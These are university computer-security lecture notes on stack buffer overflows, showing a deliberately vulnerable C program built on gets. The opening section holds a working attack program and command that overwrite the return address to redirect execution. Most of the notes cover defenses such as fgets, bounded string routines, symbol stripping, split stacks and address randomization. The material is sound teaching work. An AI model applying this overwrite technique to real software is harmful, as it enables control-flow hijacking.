Attacking The Return Address

Part of 22C:169, Computer Security Notes
by Douglas W. Jones
THE UNIVERSITY OF IOWA Department of Computer Science

A Completed Buffer Overflow Attack

The attack we demonstrated at the end of the previous lecture was really artificial. It involved a program attacking itself. What we really want to do is attack a program from outside by actually overflowing the buffer. Consider attacking this program:

/* victim */
#include <stdio.h>
#include <stdlib.h>
int getnum() {
        char buf[32];
        gets(buf);
        return atoi(buf);
}

void wrongplace() {
        printf("We got to the wrong place\n");
        exit(-1);
}

int main() {
        for (;;) {
                int i;
                i = getnum();
                printf("%d\n", i);
        }
}

This program does nothing interesting (it just outputs the same number that was provided as input), and it certainly doesn't cooperate by telling you the addresses of any of its entry points. In the worst case, an attacker might first determine that there is a buffer overflow vulnerability (by making the program crash on a long input string) and then use automated trial and error, based on generic knowledge of where in memory the compilers on that system normally put user code.

Many compilers automatically include symbolic information about variable names and entry points of subroutines in their object code so that a debugger can be used to examine the code. For example, by default, the Gnu C compiler, gcc, does so, and the Gnu debugger, gdb, allows you to print out the entry points. After starting gdb on the above victim program, the command print wrongplace gives, as output, exactly the same thing as is given by printit.

Of course, it's silly just to make the program jump to wrongplace, a dumb little subroutine that prints out its own name. What a real attacker would do is make the program being attacked jump to, for example, the routine it calls after checking the user's name and password.

We don't want to type the input string ourselves, of course; we want to automate this. Here's an automated attacker:

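/* the attack program */
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char * argv[]) {
        int i;
        long int addr;
        if (argc != 3) {
                fprintf(stderr, "usage: %s padcount hexaddr\n", argv[0]);
                return 1;
        }
        /* padding to fill the buffer and everything up to the return address */
        for (i = atoi(argv[1]); i > 0; i--) putchar(' ');
        /* the new return address, written as raw bytes in native byte order */
        addr = strtol(argv[2], NULL, 16);
        for (i = 0; i < (int)sizeof(long int); i++) putchar(((char *)&addr)[i]);
        putchar('\n');
        return 0;
}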

The command attack 8 012345678 puts out 8 spaces and then the address given in hex as 012345678 (written as raw binary bytes, not as text). The command attack 8 012345678 | victim sends the output of attack to the input of victim. On our Linux system, the command attack 40 4005fd | victim successfully causes the victim program to transfer control to the wrong place.
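
To make the layout of the attack string concrete, here is a minimal sketch that builds the same bytes in memory instead of writing them to standard output. The name build_payload and its parameters are illustrative and not part of the attack program; the address bytes are copied in the machine's native byte order, just as the loop over (char *)&addr does.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* build_payload is a hypothetical helper, not part of the attack program.
 * It fills out[] with pad spaces, then the raw bytes of addr in native
 * byte order, then a newline, and returns the number of bytes written.
 * It returns 0 if the payload would not fit in cap bytes. */
size_t build_payload(unsigned char *out, size_t cap, size_t pad, long addr) {
        size_t need;
        assert(out != NULL);
        if (pad > cap || cap - pad < sizeof addr + 1) return 0;
        need = pad + sizeof addr + 1;
        memset(out, ' ', pad);                  /* the filler */
        memcpy(out + pad, &addr, sizeof addr);  /* the new return address */
        out[need - 1] = '\n';                   /* ends the line for gets */
        return need;
}
```

On a little-endian machine with an 8-byte long, build_payload(buf, sizeof buf, 40, 0x4005fd) yields 40 spaces followed by the bytes fd 05 40 00 00 00 00 00 and a newline. Because gets stops at the first newline, an address containing the byte 0a could not be delivered this way.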

Defending Against Buffer Overflow Attacks

Don't use vulnerable routines

The obvious answer to the question of how to defend yourself against such an attack is: Don't write that kind of code. For example, never use gets. Most versions of the Unix programmer's reference manual say something like this:

When using gets, if the length of an input line exceeds the size of s, indeterminate behavior may result. For this reason, it is strongly recommended that gets be avoided in favor of fgets.

That is, replace gets(s) with fgets(s,SIZEOFS,stdin). The gets routine reads only from standard input and is not given any hints about the buffer size. In contrast, the fgets routine can read from any file, so you have to tell it which file, and it is given explicit information about the buffer length.

Unfortunately, because of the fault-prone semantics of arrays in C and C++, it is up to the programmer to tell fgets the array size. A lazy way to suppress warnings about use of gets is to simply substitute fgets(s,10000,stdin), using a big number for the buffer size, since it's easier to pick big numbers out of thin air than it is to look up the declaration of the array and put in the right number. This silences the warning without removing the vulnerability.
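
One way to avoid guessing the size is to let the compiler supply it with sizeof, which works whenever the array declaration is in scope. The following is a minimal sketch of getnum rewritten this way. The name getnum_from and its FILE * parameter are assumptions added here so the routine can read from any stream, and discarding the remainder of an overlong line is a design choice, not something the victim program does.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* getnum_from is a hypothetical variant of getnum that cannot overflow buf.
 * It returns the number at the start of the next line of in, or 0 on
 * end of file or if the line does not start with a number. */
int getnum_from(FILE *in) {
        char buf[32];
        assert(in != NULL);
        /* sizeof buf tracks the declaration, so the limit cannot go stale */
        if (fgets(buf, sizeof buf, in) == NULL) return 0;
        if (strchr(buf, '\n') == NULL) {
                /* line was too long: discard the part that did not fit */
                int ch;
                while ((ch = getc(in)) != EOF && ch != '\n') { }
        }
        return atoi(buf);
}
```

Calling getnum_from(stdin) in place of getnum() in the victim's main loop leaves its behavior on short lines unchanged. Fed the output of attack 40 4005fd, it stores only the first 31 spaces, throws away the rest of the line, and returns 0.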

The list of routines in the C library that create buffer overflow vulnerabilities is long. Among them are the strcat and strcpy routines in the string library -- they concatenate and copy strings, using a buffer provided by the caller without knowing how long that buffer is. Again, alternative routines are available that take a buffer limit as a parameter (strncat and strncpy, for example), but again, it is up to the programmer to pass the correct value.
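
As a minimal sketch of the bounded alternatives, the wrappers below are built on the standard strncat routine. The names bounded_copy and bounded_concat are illustrative, and silent truncation is only one possible policy for input that does not fit. The size argument is still supplied by the caller, so these are only as safe as the value passed.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical wrappers; dst must point to a buffer of size bytes. */

/* copy src into dst, truncating so that dst is always NUL-terminated */
void bounded_copy(char *dst, size_t size, const char *src) {
        assert(dst != NULL && src != NULL && size > 0);
        dst[0] = '\0';
        strncat(dst, src, size - 1);   /* at most size-1 chars, then a NUL */
}

/* append src to the string already in dst, truncating if necessary */
void bounded_concat(char *dst, size_t size, const char *src) {
        size_t used;
        assert(dst != NULL && src != NULL && size > 0);
        used = strlen(dst);
        assert(used < size);           /* dst must already hold a valid string */
        strncat(dst, src, size - used - 1);
}
```

For example, with char name[8], the call bounded_copy(name, sizeof name, "hello world") leaves the 7-character string "hello w" in name.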

Don't use vulnerable languages

The gets routine in C can be trivially replaced with this equally unsafe code:

void mygets( char * s ) {
        int ch;
        for (;;) {
                ch = getchar();
                if (ch == EOF) break;
                if (ch == '\n') break;
                *s = ch;
                s++;
        }
        *s = '\0';
}

This code does exactly what gets does. Searching programs for code like this is extremely difficult. The code is easy to read, well formatted and passes most guidelines for C and C++ programming style (excepting the complete lack of comments). Only when you read it and discover how it actually works, descending below the level of style into substance, do you see the danger it poses.
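
For contrast, a version of the same loop that cannot overrun its buffer must be told the buffer's size, since C gives the routine no way to discover it. This is a minimal sketch; the name mygets_bounded, the size parameter and the FILE * parameter are assumptions introduced for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* mygets_bounded is hypothetical: like mygets, but it stores at most
 * size-1 characters in s and silently drops the rest of the line.
 * It returns the number of characters stored. */
size_t mygets_bounded(char *s, size_t size, FILE *in) {
        size_t n = 0;
        int ch;
        assert(s != NULL && in != NULL && size > 0);
        for (;;) {
                ch = getc(in);
                if (ch == EOF) break;
                if (ch == '\n') break;
                if (n < size - 1) {      /* the one test mygets lacks */
                        s[n] = (char)ch;
                        n++;
                }
        }
        s[n] = '\0';
        return n;
}
```

The only substantive difference from mygets is the comparison against size. Nothing in the language forces the programmer to write it, and nothing checks that the size passed in matches the array.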

The solution, of course, is to abandon languages like C and C++ in favor of "type safe" languages such as Java and Python (or even Pascal, Ada and other type-safe languages of the 1970s). This poses two problems:

First, type safety prevents writing some system code. The most critical such piece of code is the memory manager that underlies the heap-based storage management used for dynamically created objects. Object instantiation in C++, Java and Python requires that there be such a memory manager. In the latter two languages, this memory manager is more complex than in C because it does garbage collection.

Second, type safety at the operating system interface is impossible with current operating systems. The problem is that the operating system interface itself is outside the control of the programming language designer. The system interface is designed by the operating system designer, frequently in terms of a programming environment quite different from that envisioned by the language designer.

As a result, calls to operating system services invariably involve calls outside the boundary of the programming language being used. So, programming language designers generally include tools in their languages for calling external routines, sometimes called native routines. Java certainly includes such hooks. Every such call is inherently dangerous, and the dangers cannot be dealt with in any simple way.

Use Middleware

Instead of directly calling dangerous operating system calls, call them through an intermediate software layer. We do this all the time. Very few application programs directly call read(0,&ch,1). Instead, C programmers call getchar() which, if very badly implemented, would be exactly equivalent to that call to read. In fact, getchar is much better than this for several reasons, but the most important is that the call to read has exactly the same safety problems as fgets -- it requires the buffer length (one character, in this example) to be passed as a parameter separately from the pointer to the buffer.
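
The "very badly implemented" getchar can be sketched as a thin wrapper over the POSIX read call. The name naive_getchar and its file-descriptor parameter are assumptions for illustration; real implementations of getchar buffer their input instead of making one system call per character.

```c
#include <assert.h>
#include <stdio.h>    /* for EOF */
#include <unistd.h>   /* for read, a POSIX system call */

/* naive_getchar is a hypothetical, unbuffered stand-in for getchar.
 * The caller never sees the buffer pointer or the length, so it
 * cannot pass a mismatched pair; that pairing is fixed here, once. */
int naive_getchar(int fd) {
        unsigned char ch;
        ssize_t n;
        assert(fd >= 0);
        n = read(fd, &ch, sizeof ch);
        if (n != 1) return EOF;    /* end of file or error */
        return ch;
}
```

With this definition, naive_getchar(0) reads one character from standard input and returns EOF on end of file or error, much as getchar() does.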

The middleware layers supporting languages such as Java are so well developed that most programmers never see the actual operating system interface, but it is there. The disadvantages of these middleware layers are that they can add considerably to the size of programs, and that they can, if improperly used, considerably slow down applications. Typically, this occurs because programmers don't understand the computational cost of the middleware when they design the algorithms they're using.

A serious problem with large middleware packages is that the middleware itself grows so complex that nobody understands it. The middleware isolates users from the underlying system, so that they don't understand it either, and this leads programmers to develop new middleware layers that sit on top of the old middleware layers in order to present a reasonable and comprehensible applications programming interface. This leads to a house of cards phenomenon, where tiny little applications sit atop tall towers of middleware, where the lower layers are poorly understood and have unknown vulnerabilities that have long since been forgotten by the user community.

Don't Help the Attacker

Avoid giving away information that the attacker might need. The symbolic information that compilers, by default, include in their object files allows an attacker to easily find the subroutines that they might want to get into. Obviously, making the attacker do more work is a good way to slow down the attack. With the Gnu C compiler, there are a huge number of debugging options. Full debugging information is generated only on request (the -g option), but the symbol table naming each entry point is included by default. It can be removed by linking with the -s option or by running the strip utility on the executable.

Patch the Unsafe Language

The easy buffer overflow attacks all attack return addresses on the stack, so one solution is to use a compiler that does everything it can to separate addresses from other data. There are several sets of patches to the Gnu C compiler, for example, that replace use of a single stack for local variables and return addresses with two stacks, one for local variables, and one used only for return addresses.

The price of this modification is an approximate doubling of the cost of subroutine entry. Where, formerly, there was just one stack-pointer register, there are now two, each of which gets incremented and decremented separately.

It's also possible to reorganize activation record structures in several ways. For example, pointer variables in the activation record can be carefully isolated from arrays. The language is still unsafe if arrays are not bounded, but by having the array storage separated from the stack used for other variables, buffer overflows will only damage other arrays.

Another option is to launch programs so that the code of the program runs at unpredictable addresses. If, each time a program is loaded from disk, it is relocated into a different memory address, selected at random, then a buffer overflow attack that relies on each routine being at a predictable address will fail. Buffer overflows can still create random damage, but it's much harder to create a predictable effect.
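
One way to observe whether a system loads programs at unpredictable addresses is to have a program report where its own code and stack ended up, and then run it several times. This is a minimal sketch; the names marker and report_addresses are illustrative, and the result of converting a pointer to an integer is implementation-defined, although it behaves as expected on common Unix and Linux systems.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* marker is a hypothetical routine whose only job is to have an address */
void marker(void) { }

/* report where a code address and a stack address ended up in this run */
void report_addresses(FILE *out) {
        int local = 0;
        assert(out != NULL);
        fprintf(out, "code  %#lx\n", (unsigned long)(uintptr_t)&marker);
        fprintf(out, "stack %#lx\n", (unsigned long)(uintptr_t)&local);
}
```

Call report_addresses(stdout) from main and compare the output of several runs. If the code address is the same every time, an attack that relies on a fixed address for a routine such as wrongplace remains feasible.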

Each of these defenses is imperfect, but given the large volume of C and C++ code that is out in the world today, they can improve the situation by making that code harder to attack.

Other Sources of Information

There is a short tutorial on the Gnu debugger gdb on the web. It has links to an on-line reference card that contains, on one page, a useful summary of the debugger's commands. No doubt, Google can find other sources.

The Princeton GDB Tutorial

Unix programmer's reference manual pages are available on most Unix and Linux systems using the man command. Type man man for the manual page on the man command, or type man gets to see what your system says about the gets routine. These man pages are also spread all over the web. See, for example,

gets, fgets - get a string from a stream
gets or fgets Subroutine

The compiler options for GCC are extensive. They are all listed on-line:

Invoking GCC - Using the GNU Compiler Collection (GCC)

Here is a link to one interesting web page on protecting GCC from these attacks:

GCC extension for protecting applications from stack-smashing attacks